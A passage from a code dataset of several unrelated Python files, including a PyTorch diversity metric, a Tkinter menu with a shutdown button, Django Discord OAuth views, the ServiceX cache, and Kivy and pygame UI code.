batch_indices across the `num_models` index.\n ensemble_indices = torch.arange(0, num_models).view([num_models, 1, 1])\n ensemble_indices = ensemble_indices * torch.ones([1, batch_size, 1])\n # Shape: [num_models, batch_size, n_classes].\n indices = torch.cat([ensemble_indices, batch_indices], dim=-1)\n\n # Shape: [n_models, n_points].\n # per_model_probs[n, i] contains the probability according to model `n` that\n # point `i` in the batch has its true label.\n per_model_probs = gather_nd(probs, indices)\n\n max_probs, _ = torch.max(per_model_probs, dim=0) # Shape: [n_points]\n avg_probs = torch.mean(per_model_probs, dim=0) # Shape: [n_points]\n\n return .5 * torch.mean(\n torch.square((per_model_probs - avg_probs) / max_probs))\n\n\ndef gather_nd(params, indices):\n \"\"\"params is of \"n\" dimensions and has size [x1, x2, x3, ..., xn],\n indices is of 2 dimensions and has size [num_samples, m] (m <= n)\n \"\"\"\n assert type(indices) == torch.Tensor\n return params[indices.transpose(0, 1).long().numpy().tolist()]\n","sub_path":"uncertainty_metrics/torch/diversity.py","file_name":"diversity.py","file_ext":"py","file_size_in_byte":7142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"242651112","text":"from tkinter import *\nimport tkinter.font as TkFont\nimport webbrowser\nimport os\n#from googlesearch import *\n\nroot = Tk()\nroot.title(\"Menu\")\nroot.configure(bg='#2b2b2b')\nroot.geometry('550x320')\nroot.resizable(width=0, height=0)\n'''\ndef center_window(width=745, height=120):\n \tscreen_width = root.winfo_screenwidth()\n \tscreen_height = root.winfo_screenheight()\n \tx = (screen_width/2) - (width/2)\n\t\ty = (screen_height/2) - (height/2)\n \troot.geometry('%dx%d+%d+%d' % (width, height, x, y))\n\ncenter_window(560, 320)\n'''\nfont = TkFont.Font(size=25)\ndef weather():\n\twebbrowser.open('https://www.twojapogoda.pl/')\ndef info():\n\twebbrowser.open('https://echodnia.eu/swietokrzyskie/wiadomosci/wloszczowa/')\ndef wylacz():\n\tos.system(\"shutdown now\")\ndef inter():\n\twebbrowser.open('https://google.com')\ninternet = Button(root, text=\"Internet\", command=inter, padx=74, pady=50, bg='#2b2b2b', fg='#fff', font=font)\npogoda = Button(root, text=\"Pogoda\", command=weather, padx=75, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nwiadomosci = Button(root, text=\"Wloszczowa\", command=info, padx=37, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nwylacz = Button(root, text=\"Wylacz\", command=wylacz, padx=78, pady=50, bg='#2b2b2b', fg='#fff', font=font)\nbo = Label(root, 
text=\"Biuro Obslugi Klienta: Milosz\", pady=5, fg='#fff', bg='#2b2b2b')\n\ninternet.grid(row=1, column=0)\npogoda.grid(row=1,column=1)\nwiadomosci.grid(row=2,column=0)\nwylacz.grid(row=2,column=1)\nbo.grid(row=3,column=0, columnspan=2)\n\nroot.mainloop()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"634218890","text":"__all__ = ['TemporaryDirectory', 'DeleteOnError', 'TerminalSlider', 'slider', 'slider_file']\n\nimport tempfile\nimport shutil\nimport os\nimport sys\nimport re\nimport time\n\nclass TemporaryDirectory:\n def __init__(self, dir='.'):\n self.dir = dir\n self.path = None\n\n def __enter__(self):\n self.path = tempfile.mkdtemp(dir=self.dir)\n return self.path\n\n def __exit__(self, type, value, traceback):\n if self.path is not None:\n shutil.rmtree(self.path)\n\nclass DeleteOnError:\n def __init__(self, path, opener=None):\n self.path = path\n self.opener = opener\n\n def __enter__(self):\n if self.opener is None:\n return open(self.path, 'wb')\n else:\n return self.opener(self.path, 'wb')\n\n def __exit__(self, type, value, traceback):\n if type is not None and os.path.exists(self.path):\n os.unlink(self.path)\n\ndef dotint(v):\n dotstr = str(v)\n left = dotstr[:len(dotstr)%3]\n right = re.findall('...', dotstr[len(dotstr)%3:])\n if left:\n right.insert(0, left)\n return ','.join(right)\n\nclass TerminalSlider:\n def __init__(self, maxpos, initpos=0):\n self.barfill = -1\n self.maxpos = maxpos\n self.initpos = initpos\n self.sessmax = maxpos - initpos\n try:\n import fcntl, termios, struct\n s = struct.pack(\"HHHH\", 0, 0, 0, 0)\n self.cols = struct.unpack(\"HHHH\", fcntl.ioctl(sys.stderr.fileno(),\n termios.TIOCGWINSZ, s))[1]\n except:\n self.cols = 78\n\n # 4(percent) + 2([]) + 4(spaces) + 2(endmark)\n self.barsize = self.cols - 12\n self.barsize -= len(dotint(maxpos)) # done value\n self.barfmt = '\\r%%-4s [%%s>%%s] %%-%ds ' % len(dotint(maxpos))\n self.barsize -= 23\n self.st = time.time()\n self.update(0)\n\n def update(self, value, *ext):\n if self.maxpos > 0:\n newfill = (value + self.initpos) * self.barsize // self.maxpos\n percent = str(value * 100 // self.maxpos)+'%'\n else:\n newfill = self.barsize\n percent = '0%'\n self.barfill = newfill\n sys.stderr.write(self.barfmt %\n (percent,\n '='*(newfill - 1), ' '*(self.barsize-newfill), dotint(value)))\n\n if value * 30 >= self.sessmax: # over 3%\n elapsed = time.time() - self.st\n if value > 0:\n estimated = int(self.sessmax / value * elapsed - elapsed)\n else:\n estimated = self.sessmax\n sys.stderr.write(\" ETA %02d:%02d\" %\n (estimated // 60, estimated % 60))\n sys.stderr.flush()\n\n def end(self):\n sys.stderr.write('\\n')\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.end()\n\ndef slider(it, length=None, updateevery=None):\n if length is None:\n try:\n length = len(it)\n except ValueError:\n it = list(it)\n length = len(it)\n\n s = TerminalSlider(length, 0)\n try:\n for i, el in enumerate(it):\n if updateevery is None or i % updateevery == 0:\n s.update(i)\n yield el\n else:\n s.update(length)\n finally:\n s.end()\n\ndef slider_file(f, updateevery=1000):\n f.seek(0, os.SEEK_END)\n filesize = f.tell()\n f.seek(0, os.SEEK_SET)\n\n s = TerminalSlider(filesize, 0)\n try:\n for i, it in enumerate(f):\n if i % updateevery == 0:\n s.update(f.tell())\n yield it\n else:\n s.update(filesize)\n finally:\n s.end()\n\ntry:\n limit\nexcept 
NameError:\n # backport from J. Koester's commit a78fe7a.\n def limit(pattern, **wildcards):\n return pattern.format(**{\n wildcard: \"{{{},{}}}\".format(wildcard, \"|\".join(values))\n for wildcard, values in wildcards.items()\n })\n","sub_path":"workflows/snakesupport.py","file_name":"snakesupport.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"195395374","text":"\"\"\"\n\nThe MIT License (MIT)\n\nCopyright (c) 2016, Mark Rogaski\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\"\"\"\nfrom __future__ import unicode_literals\n\nfrom datetime import datetime\n\nfrom django.http import HttpResponseRedirect\n\ntry:\n from django.urls import reverse\nexcept ImportError:\n from django.core.urlresolvers import reverse\n\nfrom django.utils.timezone import make_aware\nfrom django.db.models import Q\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login\nfrom django.core.exceptions import PermissionDenied\n\nimport requests\nfrom requests_oauthlib import OAuth2Session\n\nfrom discord_bind.models import DiscordUser, DiscordInvite\nfrom discord_bind.conf import settings\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef oauth_session(request, state=None, token=None):\n \"\"\" Constructs the OAuth2 session object. 
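The limit backport above builds Snakemake-style wildcard constraints by rewriting each wildcard as {name,value1|value2}. A self-contained copy of the helper with a sample pattern (the pattern and allowed values are illustrative only):

def limit(pattern, **wildcards):
    return pattern.format(**{
        wildcard: "{{{},{}}}".format(wildcard, "|".join(values))
        for wildcard, values in wildcards.items()
    })

print(limit("{sample}.bam", sample=["a", "b"]))  # {sample,a|b}.bam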
\"\"\"\n if settings.DISCORD_REDIRECT_URI is not None:\n redirect_uri = settings.DISCORD_REDIRECT_URI\n else:\n redirect_uri = request.build_absolute_uri(\n reverse('discord_bind_callback'))\n scope = (['identify', 'email'] if settings.DISCORD_EMAIL_SCOPE\n else ['identify'])\n if settings.DISCORD_GUILDS_SCOPE:\n scope.append(\"guilds\")\n if settings.DISCORD_INVITE_SCOPE:\n scope.append(\"guilds.join\")\n if settings.DISCORD_CONNECTIONS_SCOPE:\n scope.append(\"connections\")\n if request.GET.get(\"raise_email\", False):\n if 'email' not in scope:\n scope.append('email')\n if request.GET.get(\"optout_email\", False):\n if 'email' in scope:\n scope.remove('email')\n if request.GET.get(\"optout_join\", False):\n if 'guilds.join' in scope:\n scope.remove('guilds.join')\n if request.GET.get(\"raise_3rdparty\", False):\n if 'connections' not in scope:\n scope.append('connections')\n if request.GET.get(\"raise_guilds\", False):\n if 'guilds.join' not in scope:\n scope.append('guilds.join')\n return OAuth2Session(settings.DISCORD_CLIENT_ID,\n redirect_uri=redirect_uri,\n scope=scope,\n token=token,\n state=state)\n\n\ndef index(request):\n # Record the final redirect alternatives\n if 'invite_uri' in request.GET:\n request.session['discord_bind_invite_uri'] = request.GET['invite_uri']\n else:\n request.session['discord_bind_invite_uri'] = (\n settings.DISCORD_INVITE_URI)\n\n if 'return_uri' in request.GET:\n request.session['discord_bind_return_uri'] = request.GET['return_uri']\n else:\n request.session['discord_bind_return_uri'] = (\n settings.DISCORD_RETURN_URI)\n\n if 'next' in request.GET:\n request.session['discord_bind_next_uri'] = request.GET.get('next', \"/\")\n else:\n request.session['discord_bind_next_uri'] = \"/\"\n\n # Compute the authorization URI\n oauth = oauth_session(request)\n url, state = oauth.authorization_url(settings.DISCORD_BASE_URI +\n settings.DISCORD_AUTHZ_PATH)\n url = url + \"&prompt=none\"\n request.session['discord_bind_oauth_state'] = state\n return HttpResponseRedirect(url)\n\n\ndef callback(request):\n def decompose_data(user, token):\n \"\"\" Extract the important details \"\"\"\n data = {\n 'uid': user['id'],\n 'username': user['username'],\n 'discriminator': user['discriminator'],\n 'email': user.get('email', ''),\n 'avatar': user.get('avatar', ''),\n 'access_token': token['access_token'],\n 'refresh_token': token.get('refresh_token', ''),\n 'scope': ' '.join(token.get('scope', '')),\n }\n for k in data:\n if data[k] is None:\n data[k] = ''\n try:\n expiry = datetime.utcfromtimestamp(float(token['expires_at']))\n if settings.USE_TZ:\n expiry = make_aware(expiry)\n data['expiry'] = expiry\n except KeyError:\n pass\n return data\n\n def bind_user(request, data):\n \"\"\" Create or update a DiscordUser instance \"\"\"\n uid = data.pop('uid')\n\n remote_user = authenticate(request, remote_user=str(uid))\n\n if remote_user is not None:\n login(request, remote_user)\n else:\n return HttpResponseRedirect(\"/?login_error=true\")\n\n usrs = DiscordUser.objects.filter(uid=uid)\n usr_count = 0\n for usr in usrs:\n for k, v in data.items():\n setattr(usr, k, v)\n usr.save()\n usr_count += 1\n\n if usr_count == 0:\n new_user = DiscordUser(uid=uid, user=remote_user, **data)\n new_user.save()\n print(\"ERROR: \" + new_user.username)\n\n response = request.build_absolute_uri()\n state = request.session['discord_bind_oauth_state']\n if request.GET.get('error', False):\n if request.GET.get('error', \"\") == \"access_denied\":\n if settings.DISCORD_ERROR_URI:\n redir_url = 
settings.DISCORD_ERROR_URI\n else:\n redir_url = \"/\"\n return HttpResponseRedirect(\"{}?error=access_denied\".format(redir_url))\n if 'state' not in request.GET or request.GET['state'] != state:\n raise PermissionDenied\n oauth = oauth_session(request, state=state)\n token = oauth.fetch_token(settings.DISCORD_BASE_URI +\n settings.DISCORD_TOKEN_PATH,\n client_secret=settings.DISCORD_CLIENT_SECRET,\n authorization_response=response)\n\n # Get Discord user data\n user = oauth.get(settings.DISCORD_BASE_URI + '/users/@me').json()\n data = decompose_data(user, token)\n if settings.DISCORD_EMAIL_REQUIRED and data['email'] in (None, \"\", \" \"):\n return HttpResponseRedirect(\"{}?error=access_denied\".format(settings.DISCORD_ERROR_URI if settings.DISCORD_ERROR_URI else \"/\"))\n bind_user(request, data)\n\n # Accept Discord invites\n groups = request.user.groups.all()\n invites = DiscordInvite.objects.filter(active=True).filter(\n Q(groups__in=groups) | Q(groups=None))\n count = 0\n for invite in invites:\n r = oauth.post(settings.DISCORD_BASE_URI + '/invites/' + invite.code)\n if r.status_code == requests.codes.ok:\n count += 1\n logger.info(('accepted Discord '\n 'invite for %s/%s') % (invite.guild_name,\n invite.channel_name))\n else:\n logger.error(('failed to accept Discord '\n 'invite for %s/%s: %d %s') % (invite.guild_name,\n invite.channel_name,\n r.status_code,\n r.reason))\n\n # Select return target\n if count > 0:\n messages.success(request, '%d Discord invite(s) accepted.' % count)\n url = request.session.get('discord_bind_next_uri', \"/\")\n # url = request.session['discord_bind_invite_uri']\n else:\n url = request.session.get('discord_bind_next_uri', \"/\")\n\n # Clean up\n try:\n del request.session['discord_bind_oauth_state']\n del request.session['discord_bind_invite_uri']\n del request.session['discord_bind_return_uri']\n del request.session['discord_bind_next_uri']\n except:\n pass\n\n return HttpResponseRedirect(url)\n","sub_path":"discord_bind/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"370058617","text":"import json\nfrom pathlib import Path\nfrom typing import Dict, List, Optional, Tuple, Any\nfrom contextlib import contextmanager\n\nfrom .utils import ServiceXException, _query_cache_hash, sanitize_filename\n\n_ignore_cache = False\n\n# Make sure that generated download path names are below this to avoid os errors\nMAX_PATH_LEN = 235\n\n\n@contextmanager\ndef ignore_cache():\n '''This will cause all caches to be ignored while it is invoked:\n\n ```\n with ignore_cache():\n ServiceXDataset(...).get_data...()\n ```\n\n If you want to do this globally, you can just use the `__enter__()` method.\n This is probably the only way to do this accross cells in a notebook.\n\n ```\n i = ignore_cache()\n i.__enter__()\n ... Query code, jupyter notebook cells, etc. go here\n i.__exit(None, None, None)\n ```\n\n Note:\n\n - The only time the cache is checked is when the query is actually made, not when\n the servicex dataset object is created!\n - Calls to this can be safely nested.\n - Note that calling this doesn't clear the cache or delete anything. It\n just prevents the cache lookup from working while it is in effect.\n '''\n global _ignore_cache\n old_value = _ignore_cache\n _ignore_cache = True\n yield\n _ignore_cache = old_value\n\n\nclass Cache:\n '''\n Caching for all data returns from the system. 
It provides both in-memory\n and on-disk cache.\n\n TODO: Rename this to be an adaptor, unifying how we name things\n '''\n _in_memory_cache = {}\n\n @classmethod\n def reset_cache(cls):\n 'Reset the internal cache, usually used for testing'\n cls._in_memory_cache = {}\n\n def __init__(self, cache_path: Path, ignore_cache: bool = False):\n '''\n Create the cache object\n\n Arguments:\n\n cache_path The path to the cache directory. Only sub-directories\n will be created in this path.\n ignore_cache If true, then always ignore the cache for any queries\n against this dataset.\n '''\n self._path = cache_path\n self._ignore_cache = ignore_cache\n\n @property\n def path(self) -> Path:\n 'Return root path of cache directory'\n return self._path\n\n @contextmanager\n def ignore_cache(self):\n '''Ignore the cache as long as we are held. Supports nesting.\n '''\n old_ignore = self._ignore_cache\n self._ignore_cache = True\n yield\n self._ignore_cache = old_ignore\n\n def _query_cache_file(self, json: Dict[str, str]) -> Path:\n 'Return the query cache file'\n h = _query_cache_hash(json)\n return self._path / 'query_cache' / h\n\n def _query_status_cache_file(self, request_id: str) -> Path:\n 'Return the query cache file'\n return self._path / 'query_cache_status' / request_id\n\n def _files_cache_file(self, id: str) -> Path:\n 'Return the file that contains the list of files'\n return self._path / 'file_list_cache' / id\n\n def lookup_query(self, json: Dict[str, str]) -> Optional[str]:\n global _ignore_cache\n if _ignore_cache or self._ignore_cache:\n return None\n\n f = self._query_cache_file(json)\n if not f.exists():\n return None\n\n with f.open('r') as i:\n return i.readline().strip()\n\n def set_query(self, json: Dict[str, str], v: str):\n f = self._query_cache_file(json)\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n o.write(f'{v}\\n')\n\n def set_query_status(self, query_info: Dict[str, str]):\n '''Cache a query status (json dict)\n\n Args:\n query_info (Dict[str, str]): The info we should cache. 
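Both the module-level ignore_cache() and the Cache.ignore_cache() method above rely on the same save/set/restore pattern around a yield, which is what makes nested with-blocks behave. A stripped-down sketch of that pattern (the names here are illustrative, not part of the servicex API, and a try/finally is added so the flag is restored even on error):

from contextlib import contextmanager

_ignore = False

@contextmanager
def ignoring():
    global _ignore
    old = _ignore
    _ignore = True
    try:
        yield
    finally:
        _ignore = old

with ignoring():
    assert _ignore is True
assert _ignore is False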
Must contain `request_id`.\n '''\n assert 'request_id' in query_info, \\\n \"Internal error - request_id should always be part of info returned\"\n f = self._query_status_cache_file(query_info['request_id'])\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n json.dump(query_info, o)\n\n def lookup_query_status(self, request_id: str) -> Dict[str, str]:\n '''Returns the info from the last time the query status was cached.\n\n Args:\n request_id (str): Request id we should look up.\n\n '''\n f = self._query_status_cache_file(request_id)\n if not f.exists():\n raise ServiceXException(f'Not cache information for query {request_id}')\n with f.open('r') as o:\n return json.load(o)\n\n def remove_query(self, json: Dict[str, str]):\n f = self._query_cache_file(json)\n if f.exists():\n f.unlink()\n\n def set_files(self, id: str, files: List[Tuple[str, str]]):\n f = self._files_cache_file(id)\n f.parent.mkdir(parents=True, exist_ok=True)\n with f.open('w') as o:\n json.dump(files, o)\n\n def lookup_files(self, id: str) -> Optional[List[Tuple[str, str]]]:\n f = self._files_cache_file(id)\n if not f.exists():\n return None\n with f.open('r') as i:\n return json.load(i)\n\n def set_inmem(self, id: str, v: Any):\n self._in_memory_cache[id] = v\n\n def lookup_inmem(self, id: str) -> Optional[Any]:\n global _ignore_cache\n if _ignore_cache or self._ignore_cache:\n return None\n\n if id not in self._in_memory_cache:\n return None\n return self._in_memory_cache[id]\n\n def data_file_location(self, request_id: str, data_name: str) -> Path:\n '''\n Return the path to the file that should be written out for this\n data_name. This is where the output file should get stored.\n Truncate the leftmost characters from filenames to avoid throwing a\n OSError: [Errno 63] File name too long error Assume that the most unique part of\n the name is the right hand side\n '''\n parent = self._path / 'data' / request_id\n parent.mkdir(parents=True, exist_ok=True)\n sanitized = sanitize_filename(data_name)\n return parent / sanitized[-1 * (MAX_PATH_LEN - len(parent.name)):]\n","sub_path":"servicex/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"232443479","text":"import os\n\nimport ipywidgets as w\nimport numpy as np\nfrom glue_jupyter.utils import validate_data_argument\nfrom traitlets import Unicode, List, Bool, Any, Dict, Int\n\nfrom ...core.events import (LoadDataMessage, DataSelectedMessage,\n NewViewerMessage)\nfrom ...core.registries import trays, viewers\nfrom ...core.template_mixin import TemplateMixin\nfrom ...components.data_tree import DataTree\nfrom ..file_loader import FileLoader\n\n__all__ = ['TrayArea']\n\nwith open(os.path.join(os.path.dirname(__file__), \"tray_area.vue\")) as f:\n TEMPLATE = f.read()\n\n\nclass TrayArea(TemplateMixin):\n template = Unicode(TEMPLATE).tag(sync=True)\n drawer = Bool(True).tag(sync=True)\n data = Unicode(\"\"\"\n {\n files: undefined\n }\n \"\"\").tag(sync=True)\n methods = Unicode(\"\"\"\n {\n returnFiles() {\n return this.files && this.files.name;\n }\n }\n \"\"\").tag(sync=True)\n\n viewers = List([]).tag(sync=True)\n\n base_items_tab = Int(0).tag(sync=True)\n base_items = List([\n {\n 'id': 1,\n 'title': \"Data\",\n 'widget': \"g-data-tree\"\n }\n ]).tag(sync=True, **w.widget_serialization)\n\n plugin_items_tab = Int(0).tag(sync=True)\n plugin_items = List([]).tag(sync=True, **w.widget_serialization)\n\n def __init__(self, 
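data_file_location() above avoids over-long paths by keeping only the rightmost characters of the output file name, on the assumption that the right-hand side is the most unique part. A small illustration of that slice (MAX_PATH_LEN mirrors the constant above; the parent directory name and data file name are made-up examples, and sanitize_filename() is skipped here):

MAX_PATH_LEN = 235
parent_name = "1b2c3d4e-request-id"
data_name = "x" * 300 + "_histograms.root"
truncated = data_name[-1 * (MAX_PATH_LEN - len(parent_name)):]
print(len(truncated))  # 216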
*args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Attach tray plugins from the registries\n components = {'g-data-tree': DataTree(session=self.session),\n 'g-file-loader': FileLoader(session=self.session)}\n components.update({k: v.get('cls')(session=self.session)\n for k, v in trays.members.items()})\n\n self.components = components\n\n # Load in the references to the viewer registry. Because traitlets\n # can't serialize the actual viewer class reference, create a list of\n # dicts containing just the viewer name and label.\n self.viewers = [{'name': k, 'label': v['label']}\n for k, v in viewers.members.items()]\n\n def vue_create_viewer(self, name):\n viewer_cls = viewers.members[name]['cls']\n\n selected = self.components.get('g-data-tree').selected\n\n for idx in selected:\n data = validate_data_argument(self.data_collection,\n self.data_collection[idx])\n\n new_viewer_message = NewViewerMessage(\n viewer_cls, data=data, sender=self)\n\n self.hub.broadcast(new_viewer_message)\n","sub_path":"jdaviz/components/tray_area/tray_area.py","file_name":"tray_area.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"479394892","text":"# UserInterface.py\n# Sean Duane\n# 02/05/2013\n# Manages the UI\n\nfrom code import main_menu_widget, red_park_street_widget, subway_widget\nfrom code.user_interface.widgets import orange_line_widget, red_line_widget, \\\n\ttransit_display\nfrom kivy.uix.screenmanager import SlideTransition, Screen\n\nclass UIManager():\n\t_WidgetDictionary = {}\n\t_WidgetStack = []\n\t_CurrentWidget = None\n\t_ScreenManager = None\n\t#__RootWidget = None\n\t\n\tdef __init__(self, inScreenManager):\n\t\tself._ScreenManager = inScreenManager\n\t\tself._ScreenManager.transition=SlideTransition(direction='left')\n\t\t\n\t\tself.ConstructForms()\n\t\t\n\tdef Startup(self):\n\t\t#@HACK changing widget to the first form here\n\t\tself.ChangeWidget(\"MainMenu\", None)\n\t\t\n\tdef ConstructForms(self):\n\t\t#@HACK add forms elsewhere!\n\t\t#main menu\n\t\tself._WidgetDictionary[\"MainMenu\"] = main_menu_widget.MainMenuWidget(name=\"MainMenu\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"MainMenu\"])\n\t\t\n\t\t#subway\n\t\tself._WidgetDictionary[\"Subway\"] = subway_widget.SubwayWidget(name=\"Subway\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"Subway\"])\n\t\n\t\t#transit display\n\t\tself._WidgetDictionary[\"TransitDisplay\"] = transit_display.TransitDisplayWidget(name=\"TransitDisplay\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"TransitDisplay\"])\n\t\t\n\t\t#red line\n\t\tself._WidgetDictionary[\"RedLine\"] = red_line_widget.RedLineWidget(name=\"RedLine\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"RedLine\"])\n\t\t\n\t\t#park street\n\t\tself._WidgetDictionary[\"RedParkStreet\"] = red_park_street_widget.RedParkStreetWidget(name=\"RedParkStreet\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"RedParkStreet\"])\n\t\t\n\t\t#orange line\n\t\tself._WidgetDictionary[\"OrangeLine\"] = orange_line_widget.OrangeLineWidget(name=\"OrangeLine\")\n\t\tself._ScreenManager.add_widget(self._WidgetDictionary[\"OrangeLine\"])\n\t\n\tdef Update(self):\n\t\tpass\n\t\t\n\tdef ChangeWidget(self, inWidgetName, inWidgetArgs):\n\t\tif (inWidgetName in self._WidgetDictionary):\n\t\t\tprint (\"Pushing widget named\", inWidgetName)\n\t\t\t\n\t\t\t# Set the current widget\n\t\t\tself._CurrentWidget = 
self._WidgetDictionary[inWidgetName]\n\t\t\t# Push it to the stack\n\t\t\tself._WidgetStack.append(self._CurrentWidget)\n\t\t\t# Clear out other widgets\n\t\t\t#self._ScreenManager.clear_widgets()\n\t\t\t# Add our widget\n\t\t\t#self._ScreenManager.add_widget(self._CurrentWidget)\n\t\t\tself._CurrentWidget.PreEnter()\n\t\t\tself._CurrentWidget.Initialize(inWidgetArgs)\n\t\t\tself._ScreenManager.current = inWidgetName\n\t\telse:\n\t\t\tprint (\"No widget named \", inWidgetName)\n\t\t\t","sub_path":"ProjectMotion/code/user_interface/ui_manager.py","file_name":"ui_manager.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"269573336","text":"import pygame\r\nfrom pygame.draw import *\r\n\r\npygame.init()\r\nFPS = 30\r\nscreen = pygame.display.set_mode((800, 1000))\r\n\r\nblack = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\nyellow = (254, 240, 0)\r\n\r\n\r\n# background\r\npolygon(screen, (255, 255, 255), [(0, 0), (1000, 0), (1000, 1200), (0, 1200), (0, 0)])\r\npolygon(screen, (136, 206, 250), [(0, 0), (0, 650), (1000, 650), (1000, 0), (0, 0)])\r\npolygon(screen, (0, 0, 0), [(0, 650), (1000, 650), (1000, 651), (0, 651), (0, 650)])\r\n\r\n\r\ndef sun(x, y, r, d, do, col = yellow):\r\n \"\"\"\r\n Функция рисует солнце\r\n :param x: абсцисса центра\r\n :param y: ордината центра\r\n :param r: Радиус солнца\r\n :param d: толщина обводки круга\r\n :param do: толщина ширины \"креста\"\r\n :param col: цвет солнца\r\n :return: ---\r\n \"\"\"\r\n circle(screen, col, (x, y), r, d)\r\n rect(screen, col, [x - do / 2, y - r, do, 2 * r])\r\n rect(screen, col, [x - r, y - do / 2, 2 * r, do])\r\n\r\ndef fisher(x, y, d):\r\n \"\"\"\r\n Функция рисует медведя с удочкой\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :return: ---\r\n \"\"\"\r\n bear(x, y, d)\r\n environment(x, y, d)\r\n\r\n\r\ndef bear(x, y, d):\r\n \"\"\"\r\n Функция рисует медведя\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :param col_eyes: цвет глаз медведя\r\n :param col_mouth: цвет рта медведя\r\n :return: ---\r\n \"\"\"\r\n body(x, y, d)\r\n leg(x, y, d)\r\n arm(x, y, d)\r\n head(x, y, d)\r\n\r\ndef environment(x, y, d, col_fbody = (255, 0, 0), col_ftail = (100, 0, 0), col_feye = (254, 240, 0), col_rod_base = black, col_rod_line = black, col_water = (66, 49, 137), col_ice = (44, 146, 242)):\r\n \"\"\"\r\n Функция рисует прорубь, удочку и рыба\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_rod_base: цвет удочки\r\n :param col_rod_line: цвет лески\r\n :param col_fbody: цвет тела рыбы\r\n :param col_ftail: цвет хвоста рыбы\r\n :param col_feye: цвет глаза рыбы\r\n :param col_water: цвет воды\r\n :param col_ice: цвет льда под снегом\r\n :return: ---\r\n \"\"\"\r\n ice_hole(x, y, d, col_water, col_ice)\r\n fishing_rod(x, y, d, col_rod_base, col_rod_line)\r\n fish(x, y, d, col_fbody, col_ftail, col_feye)\r\n\r\ndef head(x, y, d, col_eyes = black, col_ground = white, col_outline = black, col_mouth = black):\r\n \"\"\"\r\n Функция рисует голову медведя\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: 
коэффициент пропорциональности(нельзя делать маленьким из-за обводки)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :param col_eyes: цвет глаз медведя\r\n :param col_mouth: цвет рта медведя\r\n :return: ---\r\n \"\"\"\r\n bear_head(x, y, d, col_ground, col_outline)\r\n eyes(x, y, d, col_eyes)\r\n ear(x, y, d, col_ground, col_outline)\r\n mouth(x, y, d, col_mouth)\r\n\r\ndef body(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисования туловища и его обводки\r\n :param x: абсцисса центра тела\r\n :param y: ординат�� центра тела\r\n :param d: Ширина тела(также можно назвать коэффициентом пропорциональности)\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return: ---\r\n \"\"\"\r\n ellipse(screen, col_ground, [x - d, y - 2 * d, 2 * d, 4 * d])\r\n ellipse(screen, col_outline, [x - d, y - 2 * d, 2 * d, 4 * d], 1)\r\n\r\ndef leg(x, y, d, col_ground = white, col_outline = black):\r\n \"\"\"\r\n Функция рисует ногу\r\n :param x: абсцисса центра тела\r\n :param y: ордината центра тела\r\n :param d: коэффициент пропорциональности\r\n :param col_ground: цвет \"грунтовки\"(меха)\r\n :param col_outline: цвет обводки\r\n :return:\r\n \"\"\"\r\n bedro(x, y, d, col_ground, col_outline)\r\n golen(x, y, d, col_ground, col_outline)\r\n\r\ndef 